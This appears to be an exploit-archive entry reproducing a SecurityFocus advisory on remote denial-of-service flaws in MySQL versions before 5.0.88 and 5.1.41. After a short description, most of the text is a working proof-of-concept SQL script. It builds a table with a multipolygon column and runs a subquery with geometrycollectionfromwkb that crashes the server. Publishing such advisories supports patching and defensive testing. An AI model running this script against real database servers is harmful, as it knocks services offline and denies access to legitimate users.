14 lines
No EOL
619 B
Text
14 lines
No EOL
619 B
Text
source: http://www.securityfocus.com/bid/37297/info
|
|
|
|
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
|
|
|
|
An attacker can exploit these issues to crash the application, denying access to legitimate users.
|
|
|
|
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable.
|
|
|
|
drop table if exists `t1`;
|
|
create table `t1`(`c0` bigint,`c3` multipolygon);
|
|
insert into `t1` values
|
|
(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));
|
|
select 1 from `t1` where
|
|
`c0` <> (select geometrycollectionfromwkb(`c3`) from `t1`); |